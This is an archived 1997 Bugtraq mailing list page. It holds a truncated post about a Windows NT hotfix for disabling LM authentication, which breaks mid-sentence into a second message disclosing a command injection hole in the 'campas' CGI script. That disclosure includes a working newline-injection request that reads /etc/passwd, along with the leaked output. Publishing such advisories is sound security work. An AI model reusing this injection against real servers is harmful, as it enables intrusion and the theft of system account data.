Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

new post SP3 hotfix: lm-fix

From: alex () DAN LV (Alex Libenson)
Date: Sat, 12 Jul 1997 21:16:01 +0300

ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/lm-fix

DOCUMENT:Q147706
TITLE:How to Disable LM Authentication on Windows NT
PRODUCT:Microsoft Windows NT, Windows 95, Windows for Workgroups 3.11 and LAN Manager 2.2c
PROD/VER:2.2 3.11 4.0 95
OPER/SYS:WINDOWS
KEYWORD:kberrmsg kbfile ntsecurity NTSrvWkst ntstop

--------------------------------------------------------------------------
The information in this article applies to:

 - Microsoft Windows NT Workstation version 4.0
 - Microsoft Windows NT Server version 4.0
 - Microsoft LAN Manager version 2.2c
 - Microsoft Windows for Workgroups version 3.11
 - Microsoft Windows 95
--------------------------------------------------------------------------

SUMMARY
=======

Windows NT supports the following two types of challenge/response
authentication:

 - LanManager (LM) challenge/response
 - Windows NT challenge/response

To allow access to servers that only support LM authentication, Windows NT
clients currently send both authentication types. Microsoft developed a
patch that supports a new registry From owner-bugtraq () NETSPACE ORG  Wed Jul 16 06:02:05 1997
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by enteract.com (8.8.5/8.7.6) with 
ESMTP id GAA07872; Wed, 16 Jul 1997 06:02:02 -0500 (CDT)
Received: from unknown () netspace org (port 6919 [128.148.157.6]) by brimstone.netspace.org with ESMTP id 
<35953-29504>; Wed, 16 Jul 1997 04:25:35 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 4391835 for BUGTRAQ () NETSPACE ORG; Wed, 16 Jul 1997 04:19:04
          -0400
Received: from brimstone.netspace.org (brimstone [128.148.157.143]) by
          netspace.org (8.8.5/8.8.2) with ESMTP id EAA12307 for
          <BUGTRAQ () NETSPACE ORG>; Wed, 16 Jul 1997 04:18:16 -0400
Received: from unknown () netspace org (port 6919 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <35892-29502>; Wed, 16 Jul 1997
          04:21:58 -0400
Approved-By: aleph1 () UNDERGROUND ORG
Received: from castor.javeriana.edu.co (castor.javeriana.edu.co
          [200.3.149.198]) by netspace.org (8.8.5/8.8.2) with ESMTP id TAA29138
          for <BUGTRAQ () NETSPACE ORG>; Tue, 15 Jul 1997 19:17:04 -0400
Received: from localhost (ftorres@localhost) by castor.javeriana.edu.co
          (8.7.5/8.7.3) with SMTP id SAA01292 for <BUGTRAQ () NETSPACE ORG>; Tue,
          15 Jul 1997 18:24:31 -0500
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.3.96.970715180941.1257A-100000 () castor javeriana edu co>
Date:   Tue, 15 Jul 1997 18:24:31 -0500
Reply-To: Francisco Torres <ftorres () CASTOR JAVERIANA EDU CO>
Sender: Bugtraq List <BUGTRAQ () NETSPACE ORG>
From: Francisco Torres <ftorres () CASTOR JAVERIANA EDU CO>
Subject:      Bug CGI campas
To: BUGTRAQ () NETSPACE ORG
In-Reply-To:  <Pine.LNX.3.96.970715183741.21934G-100000 () typhaon ucs uwa edu au>

CAMPAS SECURITY BUG
-------------------
        ET Lownoise Colombia 1997

CGI:    campas
        #!/bin/sh
        #pragma ident "@(#)campas.sh    1.2 95/05/24 NCSA"

Impact: Execute commands

Exploit:

telnet www.xxxx.net 80

Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
<PRE>
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... continue :P

Solution: 1-If u dont use it erase it.!
          2-Dont use it again.. (go point 1)

Well another line to put in vito.ini.

ET LOwnoise 1997 Colombia
Previous By Date Next
Previous By Thread Next

Current thread: